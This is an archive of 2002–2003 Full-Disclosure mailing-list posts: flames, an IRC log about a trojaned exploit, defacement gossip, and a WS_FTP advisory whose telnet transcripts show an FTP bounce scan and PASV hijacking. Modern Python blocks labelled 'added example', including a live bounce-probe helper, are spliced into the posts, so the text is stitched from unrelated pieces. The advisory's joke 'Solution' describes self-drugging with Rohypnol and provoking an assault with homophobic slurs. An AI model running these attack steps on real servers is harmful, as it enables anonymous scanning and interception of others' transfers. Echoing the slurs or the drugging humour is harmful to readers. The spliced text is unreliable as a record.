Re: [Full-Disclosure] SPAM, credit card numbers, what would you do?

2003-10-14 Thread /dev/null
On Wed, 2003-10-15 at 03:33, Cael Abal wrote:
> A number of 'hackers' recently in the news did their 'hacking' via web
> browsers -- just like you.  It could likely be successfully argued by a
> prosecutor that you intentionally stole this credit card data.  Yes, I
> know it was a via clickable link and the site was ridiculously
> unsecured, but that probably wouldn't make a difference to a court.

How is 'hacking' defined where you are? In Australia (at least in NSW),
and some other places, an access control mechanism of some description
has to be circumvented for it to be an offence.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] FW: Last Microsoft Patch

2003-10-16 Thread /dev/null
On Thu, 2003-10-16 at 14:14, Exibar wrote:
> Well, I was able to verify his GSEC.  By far the easiest of the certs he's
> listed to attain.
> 
> You would think that with at least a verified GSEC cert, that he would have
> been able to recognize what that message really was  I would have almost
> bet money that ANY CISSP would be able to tell what that message really
> was.

I'd certainly hope so.

>  ok, ok, even with a million certs you're still not expected to know
> everything but sheesh even my wife knows what that message really was
> and she "only" has a bachelor's degree!

What about a high school student with no certifications, who could see
what the messages clearly were, such as myself?



[Full-Disclosure] Re: Administrivia: Poll

2003-06-13 Thread dev-null
I find it interesting that nobody has mentioned the obvious solution.  Keep this list 
unmoderated, and create a second list, full-disclosure-moderated, that consists of 
moderated posts to the original list.  All we need is a listserver and people willing 
to moderate.

Dave Aitel of ImmunitySec started up just such a list after a similar spate of OT 
activity last summer, but it seems to have disappeared.  Anybody else willing to take 
up the reins?

--
This message has been sent via an anonymous mail relay at www.no-id.com.



[Full-Disclosure] [Full Disclosure] Ebay Spoof

2003-07-10 Thread dev-null
8675309.012webpages.com/zin/index.php



[Full-Disclosure] [Full Disclosure] re: RPC - COM event Error

2003-08-01 Thread dev-null
>[EMAIL PROTECTED]
>hope the helps:
>---

[snip]

No dumbass; 
unless you consider that a 0day too lmao.
You're just a fucking lamer, XSS yourself for a while and stay the fuck away from what 
was once a serious list but now it's scriptkiddie heaven.



[Full-Disclosure] RE: Miatrade Guestbook - Persistant XSS

2003-08-25 Thread dev-null

And the XSS Lamer king strikes again *sigh*

I'm not sure if I can take all that 1337 XSS stuff, donnie wiener can you please 
please please pretty please write a whitepaper about those 1337 skillz you surely must 
have?
I'm particularly interested in exactly how you find those highly secret bugs in 
applications and how you go and exploit them.



[Full-Disclosure] RE: Miatrade Guestbook - Persistant XSS

2003-08-25 Thread dev-null

>How about using google to find some of those papers already >written 
>about XSS? This wouldn't be too 1337, right?

That was sarcasm dude, get a brain.
A 12-year-old infant could 'discover' XSS 'holes' in stuff.
I'm just getting tired of seeing wiener's shit "0days" on this list. He has his own, 
so why doesn't he stay there and leave us alone.
No one cares about another lame XSS..

Worst part is he really thinks he's somebody and don't give me that crap "at least 
he's contributing".
I will contribute too:

 -
 Windows security hole
 -
 
 [...]
 If you press F8 on boot you'll get a secret menu.

 Fix:
 
 no fix on 0day
 [...]

 there, I contributed too.



[Full-Disclosure] Re: MS-02-052

2002-09-19 Thread dev-null

Does anybody else find it disturbing that today's JVM patch can only be installed 
through Windows Update, and the Windows Update site now attempts to install an 
unsigned control (http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.cab) 
after informing the user to "click Yes on any Security Warnings that pop up"?




Re: [Full-Disclosure] Re: MS-02-052

2002-09-20 Thread dev-null

(I am the original poster of this thread)
My main problem was that the only place to obtain the patch attempted to d/l and 
install an *unsigned* ActiveX control that is required to use Windows Update.  
Microsoft, it seems, have quietly replaced this with a signed control (however, the 
chain of trust only goes up to Microsoft Root Authority.)

The real nut-kicker in all this is the text on the Windows Update page that tells the 
user to "select YES in any "Security Warning" dialog boxes that appear".  Since the 
dialog to install a control always has a title of "Security Warning" whether the 
control is signed or not, Microsoft's instructions circumvent the whole point of code 
signing.  

I still have no idea whether the unsigned control of 2 days ago was legitimate or a 
trojan (I chose not to install it), and presumably MS isn't going to tell us.




[Full-Disclosure] www.msnbc.com

2002-10-03 Thread dev-null

www.msnbc.com shows internal IP addresses in the HTML source.

Go to www.msnbc.com and take a look at the top of the source, reload to get another, and 
so on.


NoName.
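
The check behind the post above, as an added example that is not part of the message: 
scan a response body for private, link-local or loopback IPv4 addresses, which is what 
an internal address leaking into served HTML looks like. The HTML below is constructed 
for the example (RFC 1918 addresses only); it is not what msnbc.com served. Repeating 
the scan over several reloads, as the post suggests, enumerates the backend pool.

```python
"""Find internal IPv4 addresses leaking into an HTTP response body.
Added example; the sample HTML is constructed, not captured from msnbc.com."""
import ipaddress
import re

# Loose dotted-quad pattern; ipaddress.ip_address() does the real validation,
# so "256.1.1.1" or a version string like "2.0.14.1" cannot slip through as
# internal addresses.
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def find_internal_ips(body):
    """Return the sorted, de-duplicated non-public IPv4 addresses found
    anywhere in the text, HTML comments included."""
    found = set()
    for m in IPV4_RE.finditer(body):
        try:
            addr = ipaddress.ip_address(m.group(0))
        except ValueError:
            continue                      # not a valid address at all
        if addr.is_private or addr.is_link_local or addr.is_loopback:
            found.add(str(addr))
    return sorted(found, key=ipaddress.ip_address)


# Constructed sample: the kind of server/origin comments that end up in
# served pages.  10/8, 172.16/12 and 192.168/16 are RFC 1918 ranges.
SAMPLE_HTML = """<!-- served by 10.10.3.41 -->
<html><head><!-- build 2.0.14.1 on web7 (172.16.8.9) --></head>
<body><img src="/images/logo.gif">
<!-- cache miss, origin 192.168.100.250 --></body></html>"""


def leak_report(body=SAMPLE_HTML):
    """Summarise what an internal-address scan of one response found."""
    ips = find_internal_ips(body)
    return {"internal_addresses": ips, "leaks": bool(ips)}


if __name__ == "__main__":
    print(leak_report())
```

The version string "2.0.14.1" in the sample is syntactically an IPv4 address but is 
not in any private range, so it is correctly ignored; the three RFC 1918 addresses are 
reported.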




[Full-Disclosure] RE: 7350reass (who's responsible)

2002-10-22 Thread dev-null
 k
 wasnt meant to go outside darknet ;)
 heheh maybe we should let everyone run it
 no.. it will come back to us
 i could post a half-assed analysis with warning
 yes
 that would be nice
 btw, is there a genuine bug like that? :)
 yes
 im afraid so ;)
 it isnt as easy to exploit as that trojan appeared
 a lot more work is involved
 and its still being perfected ;)
 hm
 all BSD?
 yes but only openbsd has been worked on now
 openbsd also has a pf bug
 of?
 pf*
 yes





[Full-Disclosure] IPSwitch, Inc. WS_FTP Server

2002-10-25 Thread dev-null
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



Product:   IPSwitch, Inc. WS_FTP Server
Versions:  v3.13 (dated 2002.08.07), possibly others.
Severity:  Medium-Hot


Author:low halo <[EMAIL PROTECTED]>
Date:  October 25th, 2002
Revision:  1.0




{ Overview }

WS_FTP v3.13 by IPSwitch, Inc., is vulnerable to the classic FTP bounce
attack as well as PASV connection hijacking.



{ Impact }

The FTP bounce vulnerability allows a remote attacker to cause the FTP
server to create a connection to any IP address on any TCP port greater than
1024.  Thus, the attacker can scan Internet addresses anonymously along with
any internal addresses that the FTP server has access to.  More information
on this vulnerability can be found here:
http://www.cert.org/advisories/CA-1997-27.html.
The PASV connection hijacking vulnerability allows a remote attacker to
intercept directory listings and file downloads from other users; file uploads
may also be spoofed.  No authentication is necessary to execute this attack.
More information on this vulnerability can be found here:
http://www.kb.cert.org/vuls/id/2558.



{ Details }

This demonstrates the FTP bounce vulnerability.  The internal IP address,
"192.168.1.20", is listening on port 8080, and "192.168.2.30" is dead or not
accessible via port 8080:

$ telnet x.ternal.ip.address 21
Trying x.ternal.ip.address...
Connected to x.ternal.ip.address.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PORT 192,168,1,20,31,144
200 command successful
LIST
150 Opening ASCII data connection for directory listing
226 transfer complete
PORT 192,168,2,30,31,144
200 command successful
LIST
425 Can't open data connection.


This demonstrates the PASV connection hijacking vulnerability:

$ telnet x.x.x.x 21
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PASV
227 Entering Passive Mode (192,168,1,1,4,23).
LIST
150 Opening ASCII data connection for directory listing


Next, from another IP address:

$ telnet x.x.x.x 1047
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
drwxr-x---  2 lowhalo System0 Jan  0 00:00 .
drwxr-x---  2 lowhalo System0 Jan  0 00:00 ..
-rwxr-x---  1 lowhalo System 1337 Jan  0 00:00 lh
Connection closed by foreign host.



{ Solution }

1.)  Mix yourself a Long Island Iced Tea.
2.)  Buy more Rohypnol from Paco on 7th & 30th ('cuz you used up the
  box you bought last time to get yourself out of that chicken-
  suit bind last Wednesday, remember??).
3.)  While you're not looking, slip yourself two (2) crushed 100mg pills.
4.)  Drink your Long Island while pretending to be flirting with someone
  in a bar environment (but in fact, you're still in your lonely,
  lonely apartment because you're a fucking loser and you're gonna
  die alone 28 years from now).
5.)  Put on those crotchless leather pants that you got in your closet.
  But this time, don't wear anything underneath.  Not even
  underwear.
6.)  Go to the local gay bar, even though you're not gay, and wait
  outside 'till that warm fuzzy roofies feeling starts crawling up
  your back.
7.)  Go inside the bar and look for the menacing black biker guy named
  Steve (Hey, how did you know his name is Steve if you're not
  gay, huh??).  Take the deepest breath you can and scream at the
  top of your lungs every homosexual slur that you can think of
  right in the guy's face.
8.)  Wake up 16 hours later at the bottom of a ditch in a pool of your
  own blood with that, "uh-oh, I think I forgot my jacket at the
  bar" feeling.
9.)  Try to figure out exactly what happened, and LAUGH YOUR ASS OFF
  when you do.
10.) Die alone 28 years from now, you fucking loser.


(Yeah, so anyways, IPSwitch never got back to me after two weeks, so
there is no solution to this problem.)


{ Conclusion }

A big huge shout-out goes to HACKTIVISMO (http://www.hacktivismo.com/)!!
You guys have a lot to be proud of.

And here's a quote I'd like all those iDEFENSE research contributors to
read:

"Few men have the virtue to withstand the highest bidder."
- George Washington




low halo <[EMAIL PROTECTED]>
Defender of Truth and Liberty

http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9BFD99BF
58CE 3215 226A 69ED 4D20  4044 C925 54F9 9BFD 99BF


-BEGIN PGP SIGNATURE
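
The two transcripts above, as an added example that is neither low halo's code nor 
IPSwitch's: the PORT/PASV address encoding (192,168,1,20,31,144 is 192.168.1.20 port 
31*256+144 = 8080; the 227 reply (192,168,1,1,4,23) is port 1047, the one the second 
telnet connects to), how a bounce scanner reads the 150/226 versus 425 replies, and the 
server-side checks from RFC 2577 that close both holes: accept PORT only to the 
client's own control-connection address on an unprivileged port, and accept a 
connection to a PASV port only from that same address. The `hardened=False` paths 
reproduce the behaviour the advisory describes. `bounce_probe` is a hypothetical live 
helper that assumes a reachable server, credentials and authorisation to test it; it 
needs network access and is not exercised offline.

```python
"""FTP bounce and PASV hijacking: PORT/PASV address encoding, how a scanner
reads the server's replies, and the server-side checks that close both holes.
Added example, not code from the advisory above."""
import re
import socket

_SIX = r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})"
PORT_RE = re.compile(r"^" + _SIX + r"$")
PASV_RE = re.compile(r"\(" + _SIX + r"\)")


def _decode(h1, h2, h3, h4, p1, p2):
    """h1,h2,h3,h4,p1,p2 -> ('h1.h2.h3.h4', p1*256+p2), rejecting bad octets."""
    vals = [int(x) for x in (h1, h2, h3, h4, p1, p2)]
    if any(v > 255 for v in vals):
        raise ValueError("octet out of range")
    return ".".join(str(v) for v in vals[:4]), vals[4] * 256 + vals[5]


def parse_port_arg(arg):
    """Client PORT argument, e.g. '192,168,1,20,31,144' -> ('192.168.1.20', 8080)."""
    m = PORT_RE.match(arg.strip())
    if not m:
        raise ValueError("malformed PORT argument")
    return _decode(*m.groups())


def encode_port_arg(ip, port):
    """Inverse of parse_port_arg: the PORT argument a bounce scanner sends."""
    if not 0 < port < 65536:
        raise ValueError("bad port")
    return "%s,%d,%d" % (ip.replace(".", ","), port >> 8, port & 0xFF)


def parse_pasv_reply(line):
    """Server 227 reply -> (ip, port) the server is now listening on."""
    m = PASV_RE.search(line)
    if not line.startswith("227") or not m:
        raise ValueError("not a 227 reply")
    return _decode(*m.groups())


def classify_bounce_reply(reply_lines):
    """Scanner's view of 'PORT <target>' + 'LIST': 150 followed by 226 means
    the server reached the target (port open); 425 means it could not."""
    codes = {l[:3] for l in reply_lines if l[:3].isdigit()}
    if "425" in codes:
        return "closed"
    if {"150", "226"} <= codes:
        return "open"
    return "unknown"


def server_accepts_port(control_peer_ip, port_arg, hardened=True):
    """Server-side decision for PORT.  hardened=False reproduces the advisory's
    behaviour (any host, any port above 1024: the server becomes a proxy).
    hardened=True is the RFC 2577 rule: only the client's own control-connection
    address, and only unprivileged ports."""
    ip, port = parse_port_arg(port_arg)
    if not hardened:
        return port > 1024
    return ip == control_peer_ip and port >= 1024


def server_accepts_data_peer(control_peer_ip, data_peer_ip, hardened=True):
    """Server-side decision when something connects to a PASV port.  Vulnerable:
    first connection wins, whoever it is from (hijack).  Hardened: only the
    control-connection peer may connect."""
    return True if not hardened else data_peer_ip == control_peer_ip


def _read_reply(f):
    """Read one FTP reply (including multi-line '220-' forms) as a list of lines."""
    lines = []
    while True:
        line = f.readline()
        if not line:
            break
        lines.append(line.rstrip("\r\n"))
        if len(line) >= 4 and line[:3].isdigit() and line[3] == " ":
            break
    return lines


def bounce_probe(ftp_host, user, password, target_ip, target_port, timeout=10):
    """Hypothetical live check against a server you are authorised to test
    (needs network; not run offline): log in, ask the server to connect to
    target_ip:target_port for a LIST, and classify what happened."""
    with socket.create_connection((ftp_host, 21), timeout=timeout) as s:
        f = s.makefile("rw", encoding="latin-1", newline="")

        def cmd(line):
            f.write(line + "\r\n")
            f.flush()
            return _read_reply(f)

        _read_reply(f)                          # 220 banner
        cmd("USER " + user)
        cmd("PASS " + password)
        cmd("PORT " + encode_port_arg(target_ip, target_port))
        reply = cmd("LIST")
        if reply and reply[-1].startswith("150"):
            reply += _read_reply(f)             # 226 or 425 follows the 150
        cmd("QUIT")
    return classify_bounce_reply(reply)
```

Against the first transcript, a hardened server would answer the PORT command with a 
refusal because 192.168.1.20 is not the address the control connection came from; 
against the second, the connection from "another IP address" to port 1047 would be 
dropped. Both checks are deliberate policy, not bugs: restricting PASV to the control 
peer breaks FXP (server-to-server) transfers and some clients behind proxies, which is 
why RFC 2577 leaves them configurable, so turn them on knowingly.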

[Full-Disclosure] Oracle Security Contact

2002-11-05 Thread dev-null
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Could someone please give me the security contact address for Oracle
Corporation?  It seems as though their marketing department's "Unbreakable"
slogan makes them think that it's OK to bury their security advisories &
contact info deep within their site somewhere.

Hey iDEFENSE:  wanna buy this Oracle advisory from me for $3,000???
Oh wait! ITS NOT FOR SALE!~#@$!!@  HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA
HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA
HAHAHAHAHAHAHA!@!#!$$#!#!@!

(damn, that was funny!)

Seriously, though:  I need their contact info ASAP.  Thanks.


low halo <[EMAIL PROTECTED]>
Defender of Truth and Liberty

http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9BFD99BF
58CE 3215 226A 69ED 4D20  4044 C925 54F9 9BFD 99BF


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.0 (GNU/Linux)

iD8DBQE9yDc5ySVU+Zv9mb8RAl9sAJ9Td7EL7r10NZ/BoC/dozbLlQe4HQCdEOwr
Py6aWfC289Y9s/j74Vca7NA=
=O56O
-----END PGP SIGNATURE-----





[Full-Disclosure] Ron Dufresne rears his head again (was: security industry under scrutiny)

2002-11-08 Thread dev-null
> The main point behind the rants of these lame kids is that once their
> little hacks and sploit tools are well known and defended 

Lame kids...
*Their* sploit tools...

Aren't we a walking bundle of contradiction?

I agree that it may piss off some "blackhats" when XXX bug 
finds its way onto the security lists 2-3 years later, but 
to say that attacks are well known and defended against 
means not only the end of the computer underground, but the
end of the security industry. I imagine heavenly security
professionals such as yourself wouldn't want this scenario
to transpire.

In summary, the lame kids sending winternet spools and
home directories around EFNet may get really pissed off
when they can no longer compromise computer security, but
their loss in mental stimulation is pale in comparison to
your monetary losses when Secure Internet puts the security
industry out of business.

It really irks me that a former member of the G-Force
Pakistan defacing group has the hide to denounce other
clueless kidiots.






[Full-Disclosure] full disclosure discussion

2002-11-20 Thread dev-null
There was a discussion about full-disclosure over at slashdot yesterday.

http://slashdot.org/articles/02/11/19/174214.shtml?tid=128





[Full-Disclosure] the sides of security(a 0day post)

2002-11-20 Thread dev-null
The sides of security. 

I enjoy all the conversation over this list.  Although a majority of the points 
expressed by sockz and democow are valid and I agree with most of what they say, I have 
to say that the quality of their arguments is low.  I think this is having a negative 
effect on the true points which they are trying to express.  Put some well thought out 
arguments on why/how the sec.industry should change and you will be much more 
productive.  Marcus Ranum has an excellent website full of great stuff - 
http://ranum.com/pubs/index.shtml (I also use this site as an example of someone 
keeping the sec industry in check while not being blackhat).  Another great resource 
with very well thought out arguments on disclosure/sec.industry would be the old 
anti.security.is site and message board.  Available at 
http://web.archive.org/web/20010923032408/http://anti.security.is/ (down atm). 

Anyways, the point I will try to make in this post is that of how the topic of computer 
security has become so large.  I am sure with some good research, thinking, and 
dedication someone could come up with a very insightful paper on this. 

What draws people to computer security? 

This is a broad question, but basically the way I see it is that computer security is 
an exciting field, not many will deny this.  Some see security as the most cool 
computer subject.  Some see it as the most fun.  Some see it as the most challenging. 
Some see it as the most profitable. 

The ones who see it as cool usually are seeking fame.  Although I feel it is ok to take 
credit for things you do, one must put a limit on how far they are willing to sell out, 
damage systems/people, or just do unethical things.  Once you start releasing exploits 
and vuln info to the public (or a wide range of friends/underground) you must realise the 
effects this has on thousands of people worldwide.  Is it worth giving people the power 
to cause millions of dollars of damage just to see your name in lights and have a few 
people think you are cool? 

People who see security as fun or challenging are fine, as long as this fun stays in 
check.  rm -rf / might be fun for some.  For others, writing a firewall might be fun.  This 
is a personal decision, and others should not judge.  Just because you do not agree with 
someone else's ethics does not mean you should try to force yours upon them.  State your 
opinions and perhaps they will change their mind.  Everyone evolves.  I used to be 
full-disclosure; after information, time, and thought I have changed to non-disclosure. 
Perhaps one day I will change again (maybe "responsible" disclosure).  Basically, let 
people do what they wish and you the same. 

 ive got an idea. we should all just do whatever the fuck we want. 
 fully disclose   if one desires 

The people who truly desire any given subject will always dislike the shallow ones 
who are in it solely for the money.  There will always be backstabbers, unethical, and 
sometimes downright bad people in business.  It is the nature of this society at the 
current time.  Keeping these people in check is hard to do.  Should we be mad that 
some are cashing in on something which we do for the love of it?  Sometimes I think 
yes, people are stealing ideas from others, spreading exploits, spamming their company 
name, and using other unethical methods to gain (force) employment.  Other times I think 
back to "all just do whatever the fuck we want." and really don't give a shit if these 
people are making money, I'll just keep doing what I like to do and will put in measures 
so that they cannot profit (as much) off of me. 

Suggestions to prevent people from getting into security: 

Cool/Fame - Take away full disclosure.  Make fun of them.  Make it common knowledge that 
those who do not disclose can be/are more cool than those who do.  Suggest other ways to 
be cool, to get famous, or to prove how smart they are instead of whoring code and vuln 
info. 

Fun/Challenging - Take away the fun of it.  If they are blackhat lock down networks or 
leave them so open it takes away the challenge of getting into them.  Give them no 
reason to attack you - flaming people who are willing to cause harm is usually not a 
great idea.  If they are whitehat then don't attack anything and they will not have 
fun protecting it.  I suggest the best thing for people who really dislike the 
security industry to do is to just quit security all together.  There is no way to 
damage them while you are attacking or defending computers.  Especially if you are 
attacking, this is creating business for them. 

Often times people find no fun in something no one else cares about.  If you ignore 
people sooner or later they will generally quit doing what they are doing.  If you 
give things to people without putting up a challenge it is often no fun.  Part of the 
fun is the reward from proving that you could do something (get into a computer or 
protect a computer). 

Money - Don't attac

[Full-Disclosure] cryptome.org hacked by bighawk of hackweiser

2003-03-01 Thread dev-null
~~ th3 cryptome.org d3f4c3m3nt ~~
  th3 c0nsp1r4cy th30rist [PHC]

hi.  as you know already cryptome.org was defaced 2/26/03.  the
defacement stated:
   
   hacked by bighawk of hackweiser ([EMAIL PROTECTED])

later this same bighawk sent email to the cryptome maintainer, denying
any involvement in the hack.  his initial (published) mail can be read
at:

http://cryptome.org/cryptome-hack.htm

in it our hero (bighawk) states:

"Since a few months, a few individuals have been constantly
 trying to bring me into discredit.  I believe this was their
 next step.  Until now these attempts were relatively innocent
 and could be easily ignored.  criminal actions as these i did
 not expect."

ok since most of the people reading this don't understand wtf bighawk
is talking about, let me elaborate.  for some time people have been
somewhat tolerant of this blowhard's egotistical ranting and criticism
of others (who are often much more technically skilled and much better
looking than the very unattractive Jogchem), until at some point people
got sick of him and told him he needed to shut up.  since this time, 
almost every statement made by bighawk on ircsnet has initiated brutal
verbal (well, at least typed) ownage of bighawk.

bighawk feels he has a lot to prove to the world.  why is this, you ask?

first let us examine the following urls to defacements of bighawk:

http://safemode.org/mirror/2000/08/26/www.goldenvillage.com/  
http://safemode.org/mirror/2000/08/26/www.post509.org/  
http://safemode.org/mirror/2000/08/26/www.jmpmusic.ch/

these urls, along with others, are often pasted during conversations with
the intentions of infuriating bighawk, because he is so ashamed of his
previous actions as a scriptkid (or, as he would phrase it now, in his 
elegant speech -- a malevolent cracker) and would like to be acknowledged
as no longer being lame, but as a full-fledged hacker.  in his second 
published email on cryptome.org, derogatory labels are assigned to those
"members" of the Phrack High Council that he listed; cracker is often 
used to describe "less skilled" individuals -- he would like to be known
as being better than those members of PHC.

because of bighawk's past affiliations with cracking groups (World of Hell,
HackWeiser, and recently Fluffy Bunny) he wishes to separate his current
actions from his previous, and to show off that he is no longer a "kid".

bighawk likes to show off that he finally learned how to program.  examples
of his emerging programming abilities can be seen on the packetstorm site,
i've gone ahead and listed a few links to some various stellar pieces of 
code (and various errata) that he has written.

http://packetstormsecurity.org/0005-exploits/allmanage.pl.txt
- brilliant advisory / exploit for a lame cgi

http://packetstormsecurity.org/UNIX/utilities/ipgen.tgz
- bighawk is learning perl, a scriptkiddie tool for generating
  ip lists, to be used by scriptkiddies for scriptkiddie purposes

http://packetstormsecurity.org/UNIX/utilities/ipgenv2.tar.gz
- an updated, more robust version of the previous

http://packetstormsecurity.org/UNIX/misc/squirtv1.2.tar.gz
- lame perl tool for local stress testing / automated exploitation
  (known to have never once worked, but bighawk is learning how 
   some of those exploits gov-boi gives him work)

i would have liked to have shown you some examples of his "look i read a 
phrack article on writing shellcode and wrote my own based off the examples"
shellcodes, but because of continual ridicule he has removed the links on 
his website to them, and i really can't be bothered with searching for them.

since he's now capable of writing shellcode after reading tutorials, and 
writing these nifty perl scripts he believes he is a hacker.  recently our
friend, the big hawk, has received some fame from his software "aesop" that
was featured in some article by some guy from cisco or something.  bighawk
evolved into bigego, because his tool (designed for "bouncing" between 
those .kr mailservers he owned but didn't install apache on for defacing),
to hide his online presence while hacking.

ok so anyhow we need to get back to our conspiracy theories about the
defacement and the big hawk.  it was important to first establish some
history of this criminal.  bighawk isn't exactly well liked.  he does
have a big ego, thinking that certain people occasionally "picking on him"
is a massive conspiracy against him.

anyhow, moving on . . .

th30ry #1:
bighawk is tired of being mocked for his past defacements and decides to
deface cryptome.org in a way that he can easily disassociate from (it has
my name on it, do you think i'd be that stupid?) and then can "frame" 
those who mock him so frequently for "framing him".  a little farfetched?

th30ry #2:
crytome.org was defaced by a PHC sup